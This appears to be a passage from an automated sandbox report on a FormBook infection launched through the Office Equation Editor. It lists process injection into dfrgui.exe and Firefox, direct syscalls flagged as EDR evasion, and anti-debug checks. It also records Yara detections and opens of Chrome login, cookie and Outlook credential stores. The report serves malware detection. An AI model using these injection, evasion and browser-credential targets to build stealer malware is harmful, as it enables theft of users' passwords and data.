            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: B20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EF0101 rdtsc 6_2_00EF0101
            Source: C:\Users\user\AppData\Roaming\op55336.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeWindow / User API: threadDelayed 9670Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\dfrgui.exeAPI coverage: 2.2 %
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scr TID: 3212Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep count: 289 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep time: -578000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3684Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep count: 9670 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep time: -19340000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3416Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E19553 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,8_2_61E19553
            Source: C:\Users\user\AppData\Roaming\op55336.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847199348.0000000000464000.00000004.00000020.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392215507.0000000000464000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t hFHgFS
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EF0101 rdtsc 6_2_00EF0101
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00418BA3 LdrLoadDll,6_2_00418BA3
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E900EA mov eax, dword ptr fs:[00000030h]6_2_00E900EA
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00E90080 mov ecx, dword ptr fs:[00000030h]6_2_00E90080
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EB26F8 mov eax, dword ptr fs:[00000030h]6_2_00EB26F8
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: opp[1].scr.2.dr, ---.csReference to suspicious API methods: _061D_FFFD_FFFD.GetAsyncKeyState(16)
            Source: opp[1].scr.2.dr, -C--.csReference to suspicious API methods: _061D_FFFD_FFFD.OpenProcess(_FFFD, iW_005E_06E8_061C, R)
            Source: opp[1].scr.2.dr, j.csReference to suspicious API methods: _061D_FFFD_FFFD.MapVirtualKey(_07B8.union.keyboardInput.wVk, 0)
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory written: C:\Users\user\AppData\Roaming\op55336.scr base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\op55336.scr protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\dfrgui.exeThread APC queued: target process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"Jump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: op55336.scr, 00000005.00000000.349485404.0000000000DD2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.847167433.0000000000240000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847604345.00000000027FC000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: Progman
            Source: op55336.scr, 00000005.00000000.349485404.0000000000DD2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.847167433.0000000000240000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847604345.00000000027FC000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: IsProgmanWindow
            Source: op55336.scr, 00000005.00000000.349485404.0000000000DD2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.847167433.0000000000240000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847604345.00000000027FC000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: tUser32FocusedMenuhwndMenuhMenuNonClientSysMenuRawTextRange_ScrollIntoViewRawScrollItemPattern_ScrollIntoViewget_CurrentViewRawMultipleViewPattern_SetCurrentViewget_Rowget_WindowIsKnownBadWindowRawUiaEventAddWindowGetFirstOrLastOwnedWindowGetFocusedWindowRawUiaEventRemoveWindowFindModalWindowIsTopLevelWindowIsProgmanWindowIsTransformPatternWindowIsWindowPatternWindowGetDesktopWindowIsWindowSwitchToThisWindowGetWindowGetModuleFileNameExpt_xdxCZGwDCEsywxZZUZfkyhhxget_LabeledBypt_yInitializeArrayToArrayToCharArrayPropertyArrayToIntArrayConvertToElementArraydyIsExtendedKeyMapVirtualKeyVirtualKeyFromKeyget_AcceleratorKeyget_AccessKeyRegisterHotKeyUnregisterHotKeyget_AssemblyGetExecutingAssemblyRegisterClientSideProviderAssemblyGetAssemblyRegisterProxyAssemblyget_IsReadOnlyRaiseEventInThisClientOnlyIndexOfAnyOnEventObjectDestroyCopyget_NonClientMenuBarProxyFactoryget_NonClientProxyFactoryget_User32FocusedMenuProxyFactoryget_NonClientSysMenuProxyFactoryGetProxyFromEntryDictionaryEntryop_Equalityop_InequalityAccessibilitySystem.Securityget_EmptyIsNullOrEmptyget_IsEmptyget_PropertyRuntimeIdPropertyFrameworkIdPropertyAutomationIdPropertyProcessIdPropertyIsEnabledPropertyIsSelectionRequiredPropertyIsSelectedPropertyContainingGridPropertyIsPasswordPropertyLargeChangePropertySmallChangePropertyIsGridPatternAvailablePropertyIsInvokePatternAvailablePropertyIsTablePatternAvailablePropertyIsTogglePatternAvailablePropertyIsExpandCollapsePatternAvailablePropertyIsRangeValuePatternAvailablePropertyIsValuePatternAvailablePropertyIsDockPatternAvailablePropertyIsScrollPatternAvailablePropertyIsGridItemPatternAvailablePropertyIsTableItemPatternAvailablePropertyIsScrollItemPatternAvailablePropertyIsSelectionItemPatternAvailablePropertyIsTransformPatternAvailablePropertyIsSelectionPatternAvailablePropertyIsTextPatternAvailablePropertyIsMultipleViewPatternAvailablePropertyIsWindowPatternAvailablePropertyVerticallyScrollablePropertyHorizontallyScrollablePropertyIsKeyboardFocusablePropertyNativeWindowHandlePropertyBoundingRectanglePropertyCanSelectMultiplePropertyClassNamePropertyLocalizedControlTypePropertyItemTypePropertyCulturePropertyToggleStatePropertyExpandCollapseStatePropertyWindowVisualStatePropertyWindowInteractionStatePropertyCanRotatePropertyValuePropertyCanMovePropertyVerticalViewSizePropertyHorizontalViewSizePropertyCanMinimizePropertyCanMaximizePropertyCanResizePropertyIsModalPropertyIsRequiredForFormPropertyMinimumPropertyMaximumPropertyColumnSpanPropertyRowSpanPropertyIsOffscreenPropertyColumnPropertyAutomationPropertyOrientationPropertySelectionPropertyDockPositionPropertySelectionContainerPropertyRowOrColumnMajorPropertyHasPropertyColumnHeaderItemsPropertyRowHeaderItemsPropertyColumnHeadersPropertyRowHeadersPropertyHasKeyboardFocusPropertyItemStatusPropertySupportedViewsPropertyVerticalScrollPercentPropertyHorizontalScrollPercentPropertyIsControlElementPropertyIsContentElementPropertyClickablePointPropertyColumnCountPropertyRowCountPropertyIsTopmostPropert
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\op55336.scrQueries volume information: C:\Users\user\AppData\Roaming\op55336.scr VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E936A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_61E936A0
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
